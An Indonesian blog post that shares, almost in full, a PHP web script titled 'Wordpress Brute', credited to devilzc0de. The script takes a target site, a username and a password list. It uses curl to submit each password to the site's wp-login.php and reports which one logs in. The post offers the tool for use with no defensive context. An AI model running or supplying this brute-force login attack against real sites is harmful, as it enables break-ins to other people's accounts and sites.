oke langsung aja
ni script nya
<html>
<head>
<title>Wordpress Brute By Poticous</title>
<style>
body{
background:#000000;
font-family:Tahoma,Verdana,Arial;
color:#fff;
font-size:12px;
}
.footer{
text-align:right;
padding:0 16px;
font-size:10px;
letter-spacing:2px;
color:#999999;
}
.footer:hover{
text-align:right;
padding:0 16px;
font-size:10px;
letter-spacing:2px;
color:#999999;
text-decoration:underline;
}
.input{
width:200px;
}
textarea.input{
height:100px;
}
</style>
</head>
<body>
<?php
$brute = $_GET['brute'];
if($_POST){
$file = "devilzc0de.txt";
$pwd = $_POST['passwd'];
$handle = fopen($file, 'w');
fwrite($handle, "$pwd");
fclose($handle);
set_time_limit(0);
$username = $_POST['username_target'];
$dictionary ="devilzc0de.txt";
// Mencari Value Submit http://devilzc0de.org/forum/thread-10245.html
$homepage = file_get_contents($_POST["situs_target"].'/wp-login.php');
$string_awal = '<input type="submit" name="wp-submit" id="wp-submit" class="button-primary" value="';
$string_akhir = '" tabindex="100" />';
$homepage = explode($string_awal, $homepage);
$homepage = explode($string_akhir, $homepage[1]);
##########################################
function kontrol($utarget,$ptarget){
$useragent = "Opera/9.80 (J2ME/MIDP; Opera Mini/9.80 (S60; SymbOS; Opera Mobi/23.348; U; en) Presto/2.5.25 Version/10.54";
$data = "log=$utarget&pwd=$ptarget&wp-submit=".$homepage[0]; ;
$ch = curl_init($_POST["situs_target"].'/wp-login.php');
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
$source=curl_exec ($ch);
curl_close ($ch);
if(eregi("WordPress</title>",$source)){return true;} else {return false;}
}
if(!is_file($dictionary)){echo "Kamus Password Tidak Di Temukan";exit;}
$lines=file($dictionary);
echo "Attack Starting..<br>";
sleep(10);
echo "Attack Started, brute forcing..<br>";
foreach($lines as $line){
$line=str_replace("\r","",$line);
$line=str_replace("\n","",$line);
if(kontrol($username,$line)){echo "<font color=\"green\"><b>[+]</b> username : <b>$username</b> , password : <b>$line</b><br>";}
else{echo "<font color=\"red\"><b>[-]</b> username : $username , password : $line<br>";
}
}
}else{
?>
<form action="" method="post">
<p>
<label>Username<br>
<input type="text" name="username_target" class="input"></label>
</p>
<p>
<label>List Password<br>
<textarea name="passwd" class="input"></textarea></label>
</p>
<p>
<label>Situs Target<br>
<input type="text" name="situs_target"class="input"> Ex : http://localhost/wordpress/</label>
</p>
<input type="submit" value="Brute">
</form>
<?
}
?>
<p class="footer">© <?php echo date('Y'); ?> Poticous - Devilzc0de</p>
</body>
</html> sumber : devilzc0de
Do you like this article? Share It!
0 komentar to "wordpress brutaforce (PHP)"
Posting Komentar